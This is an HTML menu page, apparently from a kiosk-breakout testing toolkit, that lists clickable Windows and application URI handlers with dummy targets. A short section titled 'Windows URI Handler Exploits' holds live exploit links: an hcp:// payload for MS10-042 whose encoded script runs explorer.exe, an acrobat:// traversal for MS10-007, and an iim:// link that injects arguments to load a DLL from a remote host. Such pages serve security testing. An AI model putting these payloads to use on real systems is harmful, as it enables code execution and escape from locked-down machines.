<link rel="stylesheet" type="text/css" media="screen" href="/css/style.css" />
<body style="background: white;">

<div id="mselect">


<p><strong>Native Windows URI Handlers</strong></p>
<p><a href='callto://dummy' target="right">callto://</a></p>
<p><a href='gopher://dummy' target="right">gopher://</a></p>
<p><a href='hcp://dummy' target="right">hcp://</a></p>
<p><a href='https://dummy' target="right">https://</a></p>
<p><a href='Rlogin://dummy' target="right">Rlogin://</a></p>
<p><a href='mailto://dummy' target="right">Mailto://</a></p>
<p><a href='msdigitallocker://dummy' target="_new">msdigitallocker:// (vista)</a></p>
<p><a href='ms-xhelp:///?install=1&product=a&version=1&locale=en-us&brandingPackage=' target="_new">ms-xhelp://</a></p>
<p><a href='NNTP://dummy' target="right">NNTP://</a></p>
<p><a href='ldap://dummy' target="right">Ldap://</a></p>
<p><a href='search-ms://dummy' target="right">search-ms://</a></p>
<p><a href='windowsmail.url.mailto://dummy' target="right">windowsmail.url.mailto:// (windows mail)</a></p>
<p><a href='windowsmail.url.news://dummy' target="right">windowsmail.url.news:// (windows mail)</a></p>
<p><a href='windowsmail.url.nntp://dummy' target="right">windowsmail.url.nntp:// (windows mail)</a></p>
<p><a href='windowsmail.url.snews://dummy' target="right">windowsmail.url.snews:// (windows mail)</a></p>
<p><a href='Telnet://dummy' target="right">Telnet://</a></p>
<p><a href='TN3270://dummy' target="right">TN3270://</a></p>
<br>
<p><strong>Windows URI Handler Exploits</strong></p>
<p><a href='hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%28%27Run%2528%2522explorer.exe%2522%2529%27%29%29%3C/script%3E' target="right">hcp:// (MS10-042)</a></p>
<p><a href='acrobat://test/#://../../c:/windows/explorer.exe' target="right">Shell Execute (MS10-007)</a></p>
<p><a href='iim://"%20-vm%20\\120.138.22.77\ikat\ikat.dll%20-url%20"'>IBM Installation Manager</a></p>


<br>
<p><strong>Common Application URI Handlers</strong></p>
<p><a href='acsui://dummy' target="right">acsui://</a></p>
<p><a href='aim://dummy' target="right">aim://</a></p>
<p><a href='aolautofix://dummy' target="right">aolautofix://</a></p>
<p><a href='acrobat://dummy' target="right">acrobat://</a></p>
<p><a href='acrobat://dummy' target="right">adobebridge://</a></p>
<p><a href='bittorrent://dummy' target="right">bittorrent://</a></p>
<p><a href='camfrog://dummy' target="right">camfront://</a></p>
<p><a href='daap://dummy' target="right">daap://</a></p>
<p><a href='ed2k://dummy' target="right">ed2k://</a></p>
<p><a href='fdaction://dummy' target="right">fdaction://</a></p>
<p><a href='feed://dummy' target="right">feed://</a></p>
<p><a href='feeds://dummy' target="right">feeds:// (outlook2k7)</a></p>
<p><a href='Firefox.Url://dummy' target="right">FireFox.Url://</a></p>
<p><a href='FirefoxURL://dummy' target="right">FireFoxURL://</a></p>
<p><a href='gtalk://dummy' target="right">gtalk://</a></p>
<p><a href='groove://dummy' target="right">groove:// (outlook2k7)</a></p>
<p><a href='grvopen://dummy' target="right">groove:// (outlook2k10)</a></p>
<p><a href='gizmoproject://dummy' target="right">gizmoproject://</a></p>
<p><a href='gnet://dummy' target="right">gnet://</a></p>
<p><a href='gnutella://dummy' target="right">gnutella://</a></p>
<p><a href='gsarcade://dummy' target="right">gsarcade://</a></p>
<p><a href='IE.FTP://dummy' target="right">IE.FTP://</a></p>
<p><a href='IE.HTTP://dummy' target="right">IE.HTTP://</a></p>
<p><a href='IE.HTTPS://dummy' target="right">IE.HTTPS://</a></p>
<p><a href='ierss://aaa' target="right">ierss://</a></p>
<p><a href='irc://dummy' target="right">irc://</a></p>
<p><a href='ICY://dummy' target="right">ICY://</a></p>
<p><a href='imesync://dummy' target="right">imesync://</a></p>
<p><a href='icquser://dummy' target="right">icquser://</a></p>
<p><a href='ircs://dummy' target="right">ircs://</a></p>
<p><a href='itms://dummy' target="right">itms://</a></p>
<p><a href='itmss://dummy' target="right">itmss://</a></p>
<p><a href='itpc://dummy' target="right">itpc://</a></p>
<p><a href='joost://dummy' target="right">joost://</a></p>
<p><a href='mapi://dummy' target="right">mapi:// (outlook)</a></p>
<p><a href='Mirc://dummy' target="right">Mirc://</a></p>
<p><a href='MSNIM://dummy' target="right">MSNIM:// (Pidgin)</a></p>
<p><a href='MYIM://dummy' target="right">MYIM:// (Pidgin)</a></p>
<p><a href='MMS://dummy' target="right">MMS:// (Media Player)</a></p>
<p><a href='MMST://dummy' target="right">MMST:// (Media Player)</a></p>
<p><a href='MSBD://dummy' target="right">MSBD:// (Media Player)</a></p>
<p><a href='MMSU://dummy' target="right">MMSU:// (Media Player)</a></p>
<p><a href='M4MacDrive://dummy' target="right">M4MacDrive://</a></p>
<p><a href='magnet://dummy' target="right">magnet://</a></p>
<p><a href='mediajukebox://dummy' target="right">mediajukebox://</a></p>
<p><a href='Morpheus://dummy' target="right">Morpheus://</a></p>
<p><a href='Mozilla://dummy' target="right">Mozilla://</a></p>
<p><a href='ms-xhelp:///?install=1&product=a&version=1&locale=en-us&brandingPackage=' target="right">ms-xhelp://</a></p>
<p><a href='mp2p://dummy' target="right">mp2p://</a></p>
<p><a href='mpodcast://dummy' target="right">mpodcast://</a></p>
<p><a href='News://dummy' target="right">News://</a></p>
<p><a href='NavigatorURL://dummy' target="right">NavigatorURL://</a></p>
<p><a href='oms://dummy' target="right">oms:// (outlook)</a></p>
<p><a href='onenote://dummy' target="right">onenote:// (Office 2k7)</a></p>
<p><a href='outlook.url.feed://dummy' target="right">outlook.url.feed:// (outlook)</a></p>
<p><a href='outlook.shell://dummy' target="right">outlook.shell:// (outlook)</a></p>
<p><a href='outlookfeed://dummy' target="right">outlookfeed:// (outlook)</a></p>
<p><a href='outlookfeeds://dummy' target="right">outlookfeeds:// (outlook)</a></p>
<p><a href='outlook.url.mailto://dummy' target="right">outlook.url.mailto:// (outlook)</a></p>
<p><a href='outlook.url.stssync://dummy' target="right">outlook.url.stssync:// (outlook)</a></p>
<p><a href='outlook.url.webcal://dummy' target="right">outlook.url.webcal:// (outlook)</a></p>
<p><a href='P2P://dummy' target="right">P2P://</a></p>
<p><a href='Pnm://dummy' target="right">Pnm://</a></p>
<p><a href='pando://dummy' target="right">pando://</a></p>
<p><a href='pcast://dummy' target="right">pcast://</a></p>
<p><a href='picasa://dummy' target="right">picasa://</a></p>
<p><a href='plaxo://dummy' target="right">plaxo://</a></p>
<p><a href='Play' target="right">Play://</a></p>
<p><a href='podcast://dummy' target="right">podcast://</a></p>
<p><a href='ppmate://dummy' target="right">ppmate://</a></p>
<p><a href='ppmates://dummy' target="right">ppmates://</a></p>
<p><a href='ppstream://dummy' target="right">ppstream://</a></p>
<p><a href='quicktime://dummy' target="right">quicktime://</a></p>
<p><a href='rhap://dummy' target="right">rhap://</a></p>
<p><a href='irc://dummy' target="right">Irc://dummy </a></p>
<p><a href='RTSP://dummy' target="right">RTSP:// (Media Player)</a></p>
<p><a href='SC://dummy' target="right">sc://</a></p>
<p><a href='shareaza://dummy' target="right">shareza://</a></p>
<p><a href='SHOUT://dummy' target="right">shout://</a></p>
<p><a href='sig2dat://dummy' target="right">sig2dat://</a></p>
<p><a href='sip://dummy' target="right">sip://</a></p>
<p><a href='sop://dummy' target="right">sop://</a></p>
<p><a href='stssync://dummy' target="right">stssync://</a></p>
<p><a href='svn://dummy' target="right">svn://</a></p>
<p><a href='svn+ssh://dummy' target="right">svn+ssh://</a></p>
<p><a href='Synacast://dummy' target="right">synacast://</a></p>
<p><a href='scp://dummy' target="right">Scp://</a></p>
<p><a href='sftp://dummy' target="right">sftp://</a></p>
<p><a href='Snews://dummy' target="right">Snews://</a></p>
<p><a href='steam://dummy' target="right">steam://</a></p>
<p><a href='Secondlife://dummy' target="right">Secondlife://</a></p>
<p><a href='Stickynotes://dummy' target="right">Stickynotes://</a></p>
<p><a href='Skype://dummy' target="right">Skype://</a></p>
<p><a href='stssync://dummy' target="right">stssync:// (outlook)</a></p>
<p><a href='torrent://dummy' target="right">torrent://</a></p>
<p><a href='TSCRec4://dummy' target="right">TSCRec4://</a></p>
<p><a href='tsvn://dummy' target="right">tvsn://</a></p>
<p><a href='tvants://dummy' target="right">tvants://</a></p>
<p><a href='tvu://dummy' target="right">tru://</a></p>
<p><a href='UNSV://dummy' target="right">unsv://</a></p>
<p><a href='UVOX://dummy' target="right">uvox://</a></p>
<p><a href='Ventrilo://dummy' target="right">ventrilo://</a></p>
<p><a href='vs://dummy' target="right">ws://</a></p>
<p><a href='WPC://dummy' target="right">wpc://</a></p>
<p><a href='Ymsgr://dummy' target="right">Ymsgr:// (Pidgin)</a></p>
<p><a href='webcal://dummy' target="right">webcal:// (outlook)</a></p>
<p><a href='webcals://dummy' target="right">webcals:// (outlook)</a></p>


</div></div>

